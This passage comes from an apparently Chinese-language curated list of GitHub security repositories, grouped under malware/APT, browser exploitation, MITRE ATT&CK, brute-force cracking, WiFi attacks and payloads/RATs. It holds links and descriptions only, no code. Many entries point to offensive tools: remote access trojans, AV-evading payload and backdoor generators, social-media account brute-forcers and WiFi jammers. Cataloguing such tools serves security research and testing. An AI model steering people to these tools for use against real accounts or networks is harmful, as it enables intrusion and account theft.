id="8cb1c42a29fa3e8825a0f8fca780c481"></a>恶意代码&&Malware&&APT *** ## <a id="e2fd0947924229d7de24b9902e1f54a0"></a>工具 - [**2058**星][2m] [C++] [lordnoteworthy/al-khaser](https://github.com/lordnoteworthy/al-khaser) 在野恶意软件使用的技术:虚拟机,仿真,调试器,沙盒检测。 - 重复区段: [渗透->工具->未分类-Pentest](#2e40f2f1df5d7f93a7de47bf49c24a0e) | - [**893**星][1m] [aptnotes/data](https://github.com/aptnotes/data) APTnotes data - [**219**星][8d] [JS] [strangerealintel/cyberthreatintel](https://github.com/strangerealintel/cyberthreatintel) Analysis of malware and Cyber Threat Intel of APT and cybercriminals groups - [**203**星][4m] [Py] [thesph1nx/absolutezero](https://github.com/thesph1nx/absolutezero) Python APT Backdoor 1.0.0.1 *** ## <a id="cfffc63a6302bd3aa79a0305ed7afd55"></a>文章 # <a id="7d5d2d22121ed8456f0c79098f5012bb"></a>REST_API&&RESTFUL *** ## <a id="3b127f2a89bc8d18b4ecb0d9c61f1d58"></a>工具 - [**1233**星][9m] [Py] [flipkart-incubator/astra](https://github.com/flipkart-incubator/astra) 自动化的REST API安全测试脚本 *** ## <a id="b16baff7e1b11133efecf1b5b6e10aab"></a>文章 # <a id="ceb90405292daed9bb32ac20836c219a"></a>蓝牙&&Bluetooth *** ## <a id="c72811e491c68f75ac2e7eb7afd3b01f"></a>工具 - [**274**星][19d] [Py] [ghostop14/sparrow-wifi](https://github.com/ghostop14/sparrow-wifi) Next-Gen GUI-based WiFi and Bluetooth Analyzer for Linux - 重复区段: [无线->未分类-WiFi](#d4efda1853b2cb0909727188116a2a8c) | - [**201**星][t] [Py] [seemoo-lab/internalblue](https://github.com/seemoo-lab/internalblue) Bluetooth experimentation framework for Broadcom and Cypress chips. *** ## <a id="97e1bdced96fc7fcd502174d6eecee36"></a>文章 # <a id="76df273beb09f6732b37a6420649179c"></a>浏览器&&browser *** ## <a id="47a03071becd6df66b469df7c2c6f9b5"></a>工具 - [**4672**星][5d] [JS] [beefproject/beef](https://github.com/beefproject/beef) The Browser Exploitation Framework Project - [**970**星][9m] [Py] [selwin/python-user-agents](https://github.com/selwin/python-user-agents) A Python library that provides an easy way to identify devices like mobile phones, tablets and their capabilities by parsing (browser) user agent strings. - [**883**星][3m] [escapingbug/awesome-browser-exploit](https://github.com/escapingbug/awesome-browser-exploit) awesome list of browser exploitation tutorials - [**459**星][2m] [Py] [globaleaks/tor2web](https://github.com/globaleaks/tor2web) Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers - [**455**星][12d] [m1ghtym0/browser-pwn](https://github.com/m1ghtym0/browser-pwn) An updated collection of resources targeting browser-exploitation. - [**411**星][3m] [Pascal] [felipedaragon/sandcat](https://github.com/felipedaragon/sandcat) 为渗透测试和开发者准备的轻量级浏览器, 基于Chromium和Lua - [**320**星][3m] [xsleaks/xsleaks](https://github.com/xsleaks/xsleaks) A collection of browser-based side channel attack vectors. - [**232**星][1y] [C#] [djhohnstein/sharpweb](https://github.com/djhohnstein/sharpweb) .NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge. - [**217**星][3m] [Py] [icsec/airpwn-ng](https://github.com/icsec/airpwn-ng) force the target's browser to do what we want *** ## <a id="ca0c0694dc0aa87534e9bb19be4ee4d5"></a>文章 # <a id="249c9d207ed6743e412c8c8bcd8a2927"></a>MitreATT&CK *** ## <a id="a88c0c355b342b835fb42abee283bd71"></a>工具 ### <a id="6ab6835b55cf5c8462c4229a4a0ee94c"></a>未分类的 - [**2758**星][] [PS] [redcanaryco/atomic-red-team](https://github.com/redcanaryco/atomic-red-team) Small and highly portable detection tests based on MITRE's ATT&CK. - [**1396**星][2d] [Py] [mitre/caldera](https://github.com/mitre/caldera) 自动化 adversary emulation 系统 - [**568**星][6m] [HTML] [nshalabi/attack-tools](https://github.com/nshalabi/attack-tools) Utilities for MITRE™ ATT&CK - [**491**星][1y] [bfuzzy/auditd-attack](https://github.com/bfuzzy/auditd-attack) A Linux Auditd rule set mapped to MITRE's Attack Framework - [**478**星][3m] [Py] [olafhartong/threathunting](https://github.com/olafhartong/threathunting) A Splunk app mapped to MITRE ATT&CK to guide your threat hunts - [**344**星][6m] [teoseller/osquery-attck](https://github.com/teoseller/osquery-attck) Mapping the MITRE ATT&CK Matrix with Osquery - [**333**星][t] [Py] [atc-project/atomic-threat-coverage](https://github.com/atc-project/atomic-threat-coverage) Actionable analytics designed to combat threats based on MITRE's ATT&CK. - [**312**星][11m] [PS] [cyb3rward0g/invoke-attackapi](https://github.com/cyb3rward0g/invoke-attackapi) A PowerShell script to interact with the MITRE ATT&CK Framework via its own API - [**201**星][3m] [infosecn1nja/awesome-mitre-attack](https://github.com/infosecn1nja/awesome-mitre-attack) A curated list of awesome resources related to Mitre ATT&CK™ Framework *** ## <a id="8512ba6c3855733a1474ca2f16153906"></a>文章 ### <a id="4b17464da487fbdf719e9a1482abf8f1"></a>新添加的 # <a id="de81f9dd79c219c876c1313cd97852ce"></a>破解&&Crack&&爆破&&BruteForce *** ## <a id="73c3c9225523cbb05333246f23342846"></a>工具 ### <a id="53084c21ff85ffad3dd9ce445684978b"></a>未分类的 - [**3325**星][1m] [C] [vanhauser-thc/thc-hydra](https://github.com/vanhauser-thc/thc-hydra) 网络登录破解,支持多种服务 - [**1925**星][29d] [Py] [lanjelot/patator](https://github.com/lanjelot/patator) Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. - [**1096**星][4m] [Py] [landgrey/pydictor](https://github.com/landgrey/pydictor) A powerful and useful hacker dictionary builder for a brute-force attack - [**898**星][3m] [Py] [trustedsec/hate_crack](https://github.com/trustedsec/hate_crack) 使用HashCat 的自动哈希破解工具 - [**894**星][29d] [Py] [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool) 测试,调整和破解JSON Web Token 的工具包 - [**857**星][7m] [C] [brendan-rius/c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker) C 语言编写的 JWT 爆破工具 - [**803**星][11m] [Py] [mak-/parameth](https://github.com/mak-/parameth) 在文件中(例如PHP 文件)暴力搜索GET 和 POST 请求的参数 - [**763**星][5m] [Py] [s0md3v/hash-buster](https://github.com/s0md3v/Hash-Buster) Crack hashes in seconds. - [**690**星][8m] [Shell] [1n3/brutex](https://github.com/1n3/brutex) Automatically brute force all services running on a target. - [**687**星][9d] [JS] [animir/node-rate-limiter-flexible](https://github.com/animir/node-rate-limiter-flexible) Node.js rate limit requests by key with atomic increments. Protection from DDoS and Brute-Force attacks in process Memory, Redis, MongoDb, Memcached, MySQL, PostgreSQL, Cluster or PM - [**659**星][5m] [C#] [shack2/snetcracker](https://github.com/shack2/snetcracker) 超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现弱密码、弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。 - [**588**星][6m] [PHP] [s3inlc/hashtopolis](https://github.com/s3inlc/hashtopolis) Hashcat wrapper, 用于跨平台分布式Hash破解 - [**563**星][2m] [Py] [pure-l0g1c/instagram](https://github.com/pure-l0g1c/instagram) Bruteforce attack for Instagram - [**559**星][1y] [CSS] [hashview/hashview](https://github.com/hashview/hashview) 密码破解和分析工具 - [**538**星][27d] [C] [nmap/ncrack](https://github.com/nmap/ncrack) Ncrack network authentication tool - [**528**星][3m] [Py] [ypeleg/hungabunga](https://github.com/ypeleg/hungabunga) HungaBunga: Brute-Force all sklearn models with all parameters using .fit .predict! - [**520**星][4m] [duyetdev/bruteforce-database](https://github.com/duyetdev/bruteforce-database) Bruteforce database - [**490**星][1y] [C] [mikeryan/crackle](https://github.com/mikeryan/crackle) Crack and decrypt BLE encryption - [**451**星][6m] [JS] [coalfire-research/npk](https://github.com/coalfire-research/npk) A mostly-serverless distributed hash cracking platform - [**442**星][1y] [C] [ryancdotorg/brainflayer](https://github.com/ryancdotorg/brainflayer) A proof-of-concept cracker for cryptocurrency brainwallets and other low entropy key alogrithms. - [**358**星][2m] [Py] [denyhosts/denyhosts](https://github.com/denyhosts/denyhosts) Automated host blocking from SSH brute force attacks - [**356**星][28d] [Java] [wycm/selenium-geetest-crack](https://github.com/wycm/selenium-geetest-crack) selenium破解滑动验证码 - [**332**星][11m] [C] [e-ago/bitcracker](https://github.com/e-ago/bitcracker) BitLocker密码破解器 - [**309**星][8d] [Go] [ropnop/kerbrute](https://github.com/ropnop/kerbrute) A tool to perform Kerberos pre-auth bruteforcing - [**304**星][2m] [Py] [yzddmr6/webcrack](https://github.com/yzddmr6/webcrack) 网站后台弱口令/万能密码批量检测工具 - [**292**星][12m] [Shell] [cyb0r9/socialbox](https://github.com/Cyb0r9/SocialBox) SocialBox is a Bruteforce Attack Framework [ Facebook , Gmail , Instagram ,Twitter ] , Coded By Belahsan Ouerghi - [**286**星][9d] [Shell] [wuseman/emagnet](https://github.com/wuseman/emagnet) Emagnet is a tool for find leaked databases with 97.1% accurate to grab mail + password together from pastebin leaks. Support for brute forcing spotify accounts, instagram accounts, ssh servers, microsoft rdp clients and gmail accounts - [**275**星][1y] [C] [jmk-foofus/medusa](https://github.com/jmk-foofus/medusa) Medusa is a speedy, parallel, and modular, login brute-forcer. - [**274**星][1y] [Shell] [thelinuxchoice/instainsane](https://github.com/thelinuxchoice/instainsane) Multi-threaded Instagram Brute Forcer (100 attemps at once) - [**250**星][1y] [Py] [avramit/instahack](https://github.com/avramit/instahack) Instagram bruteforce tool - [**250**星][1y] [Py] [hsury/geetest3-crack](https://github.com/hsury/geetest3-crack) - [**248**星][11d] [Py] [evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) 修改NTLMv1/NTLMv1-ESS/MSCHAPv1 Hask, 使其可以在hashcat中用DES模式14000破解 - [**235**星][7m] [Py] [blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) Python 3.5+ DNS asynchronous brute force utility - [**233**星][8m] [Py] [paradoxis/stegcracker](https://github.com/paradoxis/stegcracker) Steganography brute-force utility to uncover hidden data inside files - [**221**星][12m] [Py] [chris408/known_hosts-hashcat](https://github.com/chris408/known_hosts-hashcat) A guide and tool for cracking ssh known_hosts files with hashcat - [**219**星][4m] [Py] [isaacdelly/plutus](https://github.com/isaacdelly/plutus) An automated bitcoin wallet collider that brute forces random wallet addresses - [**215**星][2m] [C] [hyc/fcrackzip](https://github.com/hyc/fcrackzip) A braindead program for cracking encrypted ZIP archives. Forked from - [**207**星][27d] [Py] [m4ll0k/smbrute](https://github.com/m4ll0k/smbrute) SMB Protocol Bruteforce - [**206**星][5m] [Shell] [anshumanbh/brutesubs](https://github.com/anshumanbh/brutesubs) An automation framework for running multiple open sourced subdomain bruteforcing tools (in parallel) using your own wordlists via Docker Compose - [**204**星][1y] [JS] [lmammino/jwt-cracker](https://github.com/lmammino/jwt-cracker) jwt-cracker:HS256JWT 令牌暴力破解工具,只对弱密码有效 - [**200**星][1y] [ObjC] [sunweiliang/neteasemusiccrack](https://github.com/sunweiliang/neteasemusiccrack) iOS网易云音乐 免VIP下载、去广告、去更新 无需越狱... *** ## <a id="171e396a8965775c27602762c6638694"></a>文章 ### <a id="fc3c73849911ede2ce0d6d02f1f5b0b9"></a>新添加的 # <a id="96171a80e158b8752595329dd42e8bcf"></a>泄漏&&Breach&&Leak *** ## <a id="602bb9759b0b2ba5555b05b7218a2d6f"></a>工具 ### <a id="dc507c5be7c09e1e88af7a1ad91e2703"></a>未分类 - [**1437**星][6m] [gitguardian/apisecuritybestpractices](https://github.com/gitguardian/apisecuritybestpractices) Resources to help you keep secrets (API keys, database credentials, certificates, ...) out of source code and remediate the issue in case of a leaked API key. Made available by GitGuardian. - [**1398**星][1y] [Go] [filosottile/whosthere](https://github.com/filosottile/whosthere) A ssh server that knows who you are - [**1147**星][3m] [HTML] [cure53/httpleaks](https://github.com/cure53/httpleaks) HTTPLeaks - All possible ways, a website can leak HTTP requests - [**906**星][2m] [Py] [woj-ciech/leaklooker](https://github.com/woj-ciech/leaklooker) Find open databases - Powered by Binaryedge.io - [**862**星][3d] [Py] [circl/ail-framework](https://github.com/circl/ail-framework) AIL framework - Analysis Information Leak framework - [**728**星][2m] [streaak/keyhacks](https://github.com/streaak/keyhacks) Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. - [**726**星][3d] [Py] [globaleaks/globaleaks](https://github.com/globaleaks/globaleaks) The Open-Source Whistleblowing Software - [**301**星][5m] [Py] [wangyihang/githacker](https://github.com/wangyihang/githacker) a multiple threads tool to detect whether a site has git source leaks, and has the ability to download the site source to the local *** ## <a id="fb3bccf80281e11fdf4ef06ddaa34566"></a>文章 ### <a id="339727dd5a006d7a5bd8f0173dc80bb9"></a>新添加的 # <a id="785ad72c95e857273dce41842f5e8873"></a>爬虫 *** ## <a id="0f931c85ab54698d0bcfaf9a3e6dac73"></a>工具 ### <a id="442f9390fd56008def077a21ab65d4aa"></a>未分类 - [**758**星][2m] [Py] [nekmo/dirhunt](https://github.com/nekmo/dirhunt) Web爬虫, 针对搜索和分析路径做了优化 - 重复区段: [扫描器->工具->未分类-Scanner](#de63a029bda6a7e429af272f291bb769) | *** ## <a id="23b008498c8b41ec3128bd9855660b7d"></a>文章 ### <a id="37ca6907aa42dfd32db5973ff9eec83d"></a>新添加的 # <a id="39931e776c23e80229368dfc6fd54770"></a>无线&&WiFi&&AP&&802.11 *** ## <a id="d4efda1853b2cb0909727188116a2a8c"></a>未分类-WiFi - [**8455**星][8d] [Py] [wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) 流氓AP框架, 用于RedTeam和Wi-Fi安全测试 - 重复区段: [社工(SET)->工具->钓鱼](#290e9ae48108d21d6d8b9ea9e74d077d) | - [**6140**星][10m] [Py] [schollz/howmanypeoplearearound](https://github.com/schollz/howmanypeoplearearound) 检测 Wifi 信号统计你周围的人数 - 重复区段: [侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) | - [**5824**星][2m] [C] [spacehuhn/esp8266_deauther](https://github.com/spacehuhn/esp8266_deauther) 使用ESP8266 制作Wifi干扰器 - [**4494**星][19d] [Py] [jopohl/urh](https://github.com/jopohl/urh) Universal Radio Hacker: investigate wireless protocols like a boss - [**2989**星][5d] [JS] [evilsocket/pwnagotchi](https://github.com/evilsocket/pwnagotchi) 深度学习+Bettercap,基于A2C,从周围的WiFi环境中学习,以最大程度地利用捕获的WPA关键信息 - [**2939**星][4d] [Py] [danmcinerney/wifijammer](https://github.com/danmcinerney/wifijammer) 持续劫持范围内的Wifi客户端和AP - [**2756**星][9m] [Py] [p0cl4bs/wifi-pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin) AP攻击框架, 创建虚假网络, 取消验证攻击、请求和凭证监控、透明代理、Windows更新攻击、钓鱼管理、ARP投毒、DNS嗅探、Pumpkin代理、动态图片捕获等 - [**2745**星][1y] [C] [vanhoefm/krackattacks-scripts](https://github.com/vanhoefm/krackattacks-scripts) 检测客户端和AP是否受KRACK漏洞影响 - [**2476**星][3m] [C] [martin-ger/esp_wifi_repeater](https://github.com/martin-ger/esp_wifi_repeater) A full functional WiFi Repeater (correctly: a WiFi NAT Router) - [**2378**星][1y] [Py] [danmcinerney/lans.py](https://github.com/danmcinerney/lans.py) Inject code and spy on wifi users - [**2303**星][2m] [Shell] [v1s1t0r1sh3r3/airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) This is a multi-use bash script for Linux systems to audit wireless networks. - [**1924**星][1y] [Py] [derv82/wifite2](https://github.com/derv82/wifite2) 无线网络审计工具wifite 的升级版/重制版 - [**1881**星][5m] [Shell] [arismelachroinos/lscript](https://github.com/arismelachroinos/lscript) 自动化无线渗透和Hacking 任务的脚本 - 重复区段: [渗透->工具->自动化](#fc8737aef0f59c3952d11749fe582dac) | - [**1567**星][25d] [Py] [k4m4/kickthemout](https://github.com/k4m4/kickthemout) 使用ARP欺骗,将设备从网络中踢出去 - [**1424**星][19d] [C] [ettercap/ettercap](https://github.com/ettercap/ettercap) Ettercap Project - [**1286**星][4d] [C] [aircrack-ng/aircrack-ng](https://github.com/aircrack-ng/aircrack-ng) WiFi security auditing tools suite - [**1280**星][2m] [C] [seemoo-lab/nexmon](https://github.com/seemoo-lab/nexmon) The C-based Firmware Patching Framework for Broadcom/Cypress WiFi Chips that enables Monitor Mode, Frame Injection and much more - [**1057**星][2d] [C] [s0lst1c3/eaphammer](https://github.com/s0lst1c3/eaphammer) 针对WPA2-Enterprise 网络的定向双重攻击(evil twin attacks) - [**1038**星][2m] [C] [t6x/reaver-wps-fork-t6x](https://github.com/t6x/reaver-wps-fork-t6x) 攻击 Wi-Fi Protected Setup (WPS), 恢复 WPA/WPA2 密码 - [**1007**星][1y] [Py] [entropy1337/infernal-twin](https://github.com/entropy1337/infernal-twin) 自动化无线Hack 工具 - [**994**星][1y] [Py] [tylous/sniffair](https://github.com/tylous/sniffair) 无线渗透框架. 解析被动收集的无线数据, 执行复杂的无线攻击 - [**991**星][2m] [C] [wiire-a/pixiewps](https://github.com/wiire-a/pixiewps) An offline Wi-Fi Protected Setup brute-force utility - [**985**星][1y] [HTML] [sensepost/mana](https://github.com/sensepost/mana) *DEPRECATED* mana toolkit for wifi rogue AP attacks and MitM - [**916**星][2m] [TeX] [ethereum/yellowpaper](https://github.com/ethereum/yellowpaper) The "Yellow Paper": Ethereum's formal specification - [**854**星][2m] [C] [spacehuhn/wifi_ducky](https://github.com/spacehuhn/wifi_ducky) Upload, save and run keystroke injection payloads with an ESP8266 + ATMEGA32U4 - [**799**星][1y] [ObjC] [igrsoft/kismac2](https://github.com/igrsoft/kismac2) KisMAC is a free, open source wireless stumbling and security tool for Mac OS X. - [**781**星][2m] [Py] [konradit/gopro-py-api](https://github.com/konradit/gopro-py-api) Unofficial GoPro API Library for Python - connect to GoPro via WiFi. - [**761**星][8m] [Py] [misterbianco/boopsuite](https://github.com/MisterBianco/BoopSuite) 无线审计与安全测试 - [**685**星][11m] [ObjC] [unixpickle/jamwifi](https://github.com/unixpickle/jamwifi) A GUI, easy to use WiFi network jammer for Mac OS X - [**654**星][8m] [C] [wifidog/wifidog-gateway](https://github.com/wifidog/wifidog-gateway) Repository for the wifidog-gateway captive portal designed for embedded systems - [**617**星][4m] [C] [matheus-garbelini/esp32_esp8266_attacks](https://github.com/matheus-garbelini/esp32_esp8266_attacks) Proof of Concept of ESP32/8266 Wi-Fi vulnerabilties (CVE-2019-12586, CVE-2019-12587, CVE-2019-12588) - [**527**星][] [C++] [cyberman54/esp32-paxcounter](https://github.com/cyberman54/esp32-paxcounter) Wifi & BLE driven passenger flow metering with cheap ESP32 boards - [**477**星][3m] [Shell] [staz0t/hashcatch](https://github.com/staz0t/hashcatch) Capture handshakes of nearby WiFi networks automatically - [**467**星][2m] [Py] [savio-code/fern-wifi-cracker](https://github.com/savio-code/fern-wifi-cracker) 无线安全审计和攻击工具, 能破解/恢复 WEP/WPA/WPSkey等 - [**462**星][21d] [Java] [lennartkoopmann/nzyme](https://github.com/lennartkoopmann/nzyme) 直接收集空中的802.11 管理帧,并将其发送到 Graylog,用于WiFi IDS, 监控, 及事件响应。(Graylog:开源的日志管理系统) - [**419**星][9d] [Py] [jpaulmora/pyrit](https://github.com/jpaulmora/pyrit) The famous WPA precomputed cracker, Migrated from Google. - [**397**星][4d] [C] [freifunk-gluon/gluon](https://github.com/freifunk-gluon/gluon) a modular framework for creating OpenWrt-based firmwares for wireless mesh nodes - [**384**星][5d] [C++] [bastibl/gr-ieee802-11](https://github.com/bastibl/gr-ieee802-11) IEEE 802.11 a/g/p Transceiver - [**327**星][3m] [Shell] [vanhoefm/modwifi](https://github.com/vanhoefm/modwifi) - [**321**星][4d] [Java] [wiglenet/wigle-wifi-wardriving](https://github.com/wiglenet/wigle-wifi-wardriving) Nethugging client for Android, from wigle.net - [**313**星][4m] [TeX] [chronaeon/beigepaper](https://github.com/chronaeon/beigepaper) Rewrite of the Yellowpaper in non-Yellowpaper syntax. - [**278**星][3m] [C] [sensepost/hostapd-mana](https://github.com/sensepost/hostapd-mana) SensePost's modified hostapd for wifi attacks. - [**277**星][18d] [C] [br101/horst](https://github.com/br101/horst) “horst” - lightweight IEEE802.11 wireless LAN analyzer with a text interface - [**274**星][19d] [Py] [ghostop14/sparrow-wifi](https://github.com/ghostop14/sparrow-wifi) Next-Gen GUI-based WiFi and Bluetooth Analyzer for Linux - 重复区段: [蓝牙->工具](#c72811e491c68f75ac2e7eb7afd3b01f) | - [**260**星][1y] [Py] [wipi-hunter/pidense](https://github.com/wipi-hunter/pidense) Monitor illegal wireless network activities. - [**255**星][1m] [C] [mame82/logitacker](https://github.com/mame82/logitacker) Enumerate and test Logitech wireless input devices for vulnerabilities with a nRF52840 radio dongle. - [**240**星][8m] [Py] [lionsec/wifresti](https://github.com/lionsec/wifresti) Find your wireless network password in Windows , Linux and Mac OS - [**212**星][1m] [Shell] [aress31/wirespy](https://github.com/aress31/wirespy) Framework designed to automate various wireless networks attacks (the project was presented on Pentester Academy TV's toolbox in 2017). *** ## <a id="8d233e2d068cce2b36fd0cf44d10f5d8"></a>WPS&&WPA&&WPA2 - [**319**星][4m] [Py] [hash3lizer/wifibroot](https://github.com/hash3lizer/wifibroot) A WiFi Pentest Cracking tool for WPA/WPA2 (Handshake, PMKID, Cracking, EAPOL, Deauthentication) *** ## <a id="8863b7ba27658d687a85585e43b23245"></a>802.11 # <a id="80301821d0f5d8ec2dd3754ebb1b4b10"></a>Payload&&远控&&RAT *** ## <a id="783f861b9f822127dba99acb55687cbb"></a>工具 ### <a id="6602e118e0245c83b13ff0db872c3723"></a>未分类-payload - [**1829**星][6m] [Py] [veil-framework/veil](https://github.com/veil-framework/veil) generate metasploit payloads that bypass common anti-virus solutions - [**1258**星][2m] [PS] [hak5/bashbunny-payloads](https://github.com/hak5/bashbunny-payloads) The Official Bash Bunny Payload Repository - [**982**星][2m] [C] [zardus/preeny](https://github.com/zardus/preeny) Some helpful preload libraries for pwning stuff. - [**569**星][11m] [Py] [genetic-malware/ebowla](https://github.com/genetic-malware/ebowla) Framework for Making Environmental Keyed Payloads (NO LONGER SUPPORTED) - [**546**星][3m] [C++] [screetsec/brutal](https://github.com/screetsec/brutal) Payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy . Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device ( Payload Teensy ) - [**493**星][5d] [Py] [ctxis/cape](https://github.com/ctxis/cape) Malware Configuration And Payload Extraction - [**343**星][8m] [Java] [portswigger/param-miner](https://github.com/portswigger/param-miner) identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities - [**339**星][12m] [JS] [gabemarshall/brosec](https://github.com/gabemarshall/brosec) Brosec - An interactive reference tool to help security professionals utilize useful payloads and commands. - [**288**星][1m] [Shell] [petit-miner/blueberry-pi](https://github.com/petit-miner/blueberry-pi) Blueberry PI - [**262**星][2m] [Py] [felixweyne/imaginaryc2](https://github.com/felixweyne/imaginaryc2) Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads. - [**246**星][13d] [C] [shchmue/lockpick_rcm](https://github.com/shchmue/lockpick_rcm) Nintendo Switch encryption key derivation bare metal RCM payload - [**244**星][7d] [cujanovic/open-redirect-payloads](https://github.com/cujanovic/open-redirect-payloads) Open Redirect Payloads - [**238**星][6d] [cujanovic/markdown-xss-payloads](https://github.com/cujanovic/markdown-xss-payloads) XSS payloads for exploiting Markdown syntax - [**235**星][5m] [Shell] [hak5/packetsquirrel-payloads](https://github.com/hak5/packetsquirrel-payloads) The Official Packet Squirrel Payload Repository - [**233**星][6m] [cr0hn/nosqlinjection_wordlists](https://github.com/cr0hn/nosqlinjection_wordlists) This repository contains payload to test NoSQL Injections - [**232**星][18d] [PS] [rsmudge/elevatekit](https://github.com/rsmudge/elevatekit) The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload. - [**229**星][3m] [Py] [whitel1st/docem](https://github.com/whitel1st/docem) Uility to embed XXE and XSS payloads in docx,odt,pptx,etc (OXML_XEE on steroids) - [**227**星][2m] [Py] [brent-stone/can_reverse_engineering](https://github.com/brent-stone/can_reverse_engineering) Automated Payload Reverse Engineering Pipeline for the Controller Area Network (CAN) protocol - [**217**星][2m] [PHP] [zigoo0/jsonbee](https://github.com/zigoo0/jsonbee) A ready to use JSONP endpoints/payloads to help bypass content security policy (CSP) of different websites. - [**210**星][4d] [Py] [danmcinerney/msf-autoshell](https://github.com/danmcinerney/msf-autoshell) Feed the tool a .nessus file and it will automatically get you MSF shell ### <a id="b5d99a78ddb383c208aae474fc2cb002"></a>Payload收集 - [**22055**星][20d] [PHP] [danielmiessler/seclists](https://github.com/danielmiessler/seclists) 多种类型资源收集:用户名、密码、URL、敏感数据类型、Fuzzing Payload、WebShell等 - [**11389**星][3d] [Py] [swisskyrepo/payloadsallthethings](https://github.com/swisskyrepo/payloadsallthethings) A list of useful payloads and bypass for Web Application Security and Pentest/CTF - [**2078**星][2m] [edoverflow/bugbounty-cheatsheet](https://github.com/edoverflow/bugbounty-cheatsheet) A list of interesting payloads, tips and tricks for bug bounty hunters. - [**2057**星][9m] [Shell] [foospidy/payloads](https://github.com/foospidy/payloads) web 攻击 Payload 集合 - [**1870**星][11m] [PHP] [bartblaze/php-backdoors](https://github.com/bartblaze/php-backdoors) A collection of PHP backdoors. For educational or testing purposes only. - [**783**星][19d] [payloadbox/xss-payload-list](https://github.com/payloadbox/xss-payload-list) XSS 漏洞Payload列表 - [**373**星][3m] [renwax23/xss-payloads](https://github.com/renwax23/xss-payloads) List of XSS Vectors/Payloads - [**298**星][4m] [Py] [thekingofduck/easyxsspayload](https://github.com/thekingofduck/easyxsspayload) XssPayload List . Usage: - [**262**星][4m] [payloadbox/command-injection-payload-list](https://github.com/payloadbox/command-injection-payload-list) ### <a id="b318465d0d415e35fc0883e9894261d1"></a>远控&&RAT - [**5131**星][4m] [Py] [n1nj4sec/pupy](https://github.com/n1nj4sec/pupy) Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python - [**1745**星][7m] [Smali] [ahmyth/ahmyth-android-rat](https://github.com/ahmyth/ahmyth-android-rat) Android Remote Administration Tool - [**1335**星][1y] [Py] [marten4n6/evilosx](https://github.com/marten4n6/evilosx) An evil RAT (Remote Administration Tool) for macOS / OS X. - [**780**星][2m] [Py] [kevthehermit/ratdecoders](https://github.com/kevthehermit/ratdecoders) Python Decoders for Common Remote Access Trojans - [**599**星][1y] [PS] [fortynorthsecurity/wmimplant](https://github.com/FortyNorthSecurity/WMImplant) This is a PowerShell based tool that is designed to act like a RAT. Its interface is that of a shell where any command that is supported is translated into a WMI-equivalent for use on a network/remote machine. WMImplant is WMI based. - [**500**星][6m] [Visual Basic .NET] [nyan-x-cat/lime-rat](https://github.com/nyan-x-cat/lime-rat) LimeRAT | Simple, yet powerful remote administration tool for Windows (RAT) - [**372**星][3m] [C++] [werkamsus/lilith](https://github.com/werkamsus/lilith) Lilith, The Open Source C++ Remote Administration Tool (RAT) - [**323**星][3d] [C#] [nyan-x-cat/asyncrat-c-sharp](https://github.com/nyan-x-cat/asyncrat-c-sharp) Open-Source Remote Administration Tool For Windows C# (RAT) - [**317**星][6m] [Py] [mvrozanti/rat-via-telegram](https://github.com/mvrozanti/rat-via-telegram) Windows Remote Administration Tool via Telegram - [**293**星][4m] [C++] [yuanyuanxiang/simpleremoter](https://github.com/yuanyuanxiang/simpleremoter) 基于gh0st的远程控制器:实现了终端管理、进程管理、窗口管理、远程桌面、文件管理、语音管理、视频管理、服务管理、注册表管理等功能,优化全部代码及整理排版,修复内存泄漏缺陷,程序运行稳定。此项目初版见: ### <a id="ad92f6b801a18934f1971e2512f5ae4f"></a>Payload生成 - [**3369**星][8d] [C] [screetsec/thefatrat](https://github.com/screetsec/thefatrat) Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw… - 重复区段: [后渗透->工具->未分类-post-exp](#12abc279c69d1fcf10692b9cb89bcdf7) | - [**2678**星][4m] [Java] [frohoff/ysoserial](https://github.com/frohoff/ysoserial) 生成会利用不安全的Java对象反序列化的Payload - [**1792**星][t] [Shell] [leebaird/discover](https://github.com/leebaird/discover) 自定义的bash脚本, 用于自动化多个渗透测试任务, 包括: 侦查、扫描、解析、在Metasploit中创建恶意Payload和Listener - 重复区段: [渗透->工具->自动化](#fc8737aef0f59c3952d11749fe582dac) |[渗透->工具->Metasploit->未分类-metasploit](#01be61d5bb9f6f7199208ff0fba86b5d) |[侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) | - [**1339**星][3m] [PS] [peewpw/invoke-psimage](https://github.com/peewpw/invoke-psimage) Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute - [**1075**星][5m] [Py] [nccgroup/winpayloads](https://github.com/nccgroup/winpayloads) Undetectable Windows Payload Generation - [**1016**星][1y] [Py] [d4vinci/dr0p1t-framework](https://github.com/d4vinci/dr0p1t-framework) 创建免杀的Dropper - [**884**星][19d] [PHP] [ambionics/phpggc](https://github.com/ambionics/phpggc) PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically. - [**872**星][10m] [Visual Basic .NET] 